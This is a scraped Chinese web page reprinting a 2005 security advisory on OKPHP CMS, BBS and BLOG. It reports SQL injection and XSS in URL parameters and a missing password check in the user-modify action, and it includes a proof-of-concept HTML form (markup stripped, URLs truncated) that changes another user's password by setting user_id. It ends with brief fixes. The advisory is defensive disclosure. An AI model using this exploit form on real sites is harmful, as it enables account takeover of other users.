okphp系列产品的多个漏洞-PHP安全-PHP教程-幽默笑话

首页 > 西方诗歌 > 文章

okphp系列产品的多个漏洞-PHP安全-PHP教程-幽默笑话

文章内容okphp系列产品的多个漏洞修改时间:[2008/08/0813:44]阅读次数:[534]发表者:[起缘]本文作者:SuperHei文章性质:原创发布日期:2005-08-14程序描叙  OKPHP是由开发一套专业的网站管理系统,目前产品包括:OkphpCMS,OkphpBBS,OkphpBLOG。 由于对变量的过滤不严密及密码认证不严,导致sql注射,xss,隐藏变量post攻击从跨权限操作。 漏洞攻击1、SQl注射及xss  几乎存在于各个变量里,如::///=view_forumforum_id={sql}http:///=view_forumforum_id=xss.......2、隐藏变量post攻击  在提交=user_modify修改用户资料时,没有密码认证导致通过user_id修改容易用户密码及资料;Exp:htmlheadtitleOkphpDiscussions-poweredbyokphpBBS/titlemetahttp-equiv=Content-Typecontent=text/html;charset=gb2312linkhref=bbs/themes/default/css/darkblue/=stylesheettype=text/css/headbodybgcolor=#CCCCCCtext=#000000tableclass=forumline2cellspacing=1cellpadding=3border=0formname=form1method=postaction=http:///=multipart/form-datatrthcolspan=2background=bbs/themes/default/images/darkblue/th_修改信息/th/trtrclass=row1/trtrclass=row2tdwidth=20%valign=topalign=right密码/tdtdwidth=80%pinputtype=passwordname=password1size=20重复输入inputtype=passwordname=password2size=20/p/td/trtrclass=row2tdwidth=20%valign=topalign=rightrowspan=2头像地址/tdtdwidth=80%pinputtype=textname=headpicsize=80value=http:///bbs/images/headp/宽度inputtype=textname=h_widthsize=3value=0px,长度inputtype=textname=h_heightsize=3value=0px(最大限制:100px)/p/td/trtrclass=row2tdwidth=80%inputtype=filename=upfile/td/trtrclass=row1tdwidth=20%height=2align=right电子邮件/tdtdwidth=80%height=2inputtype=textname=emailsize=20value=[emailprotected]/td/trtrclass=row2tdwidth=20%valign=topalign=right签名/tdtdwidth=80%ptextareaname=sigcols=50rows=5/textarea/p/td/trtrclass=row1tdwidth=20%height=2align=right用户简介/tdtdwidth=80%height=2textareaname=intrcols=50rows=5/textarea/td/trtrclass=row2align=centertdcolspan=2height=2inputtype=hiddenname=actionvalue=user_modifyinputtype=hiddenname=stepvalue=2inputtype=textname=user_idvalue=836inputtype=hiddenname=md5passvalue={md5pass}inputtype=submitname=Submitvalue=Submitclass=catbutton/td/tr/form/table/body/html解决办法1、加强对变量过滤2、增加密码认证。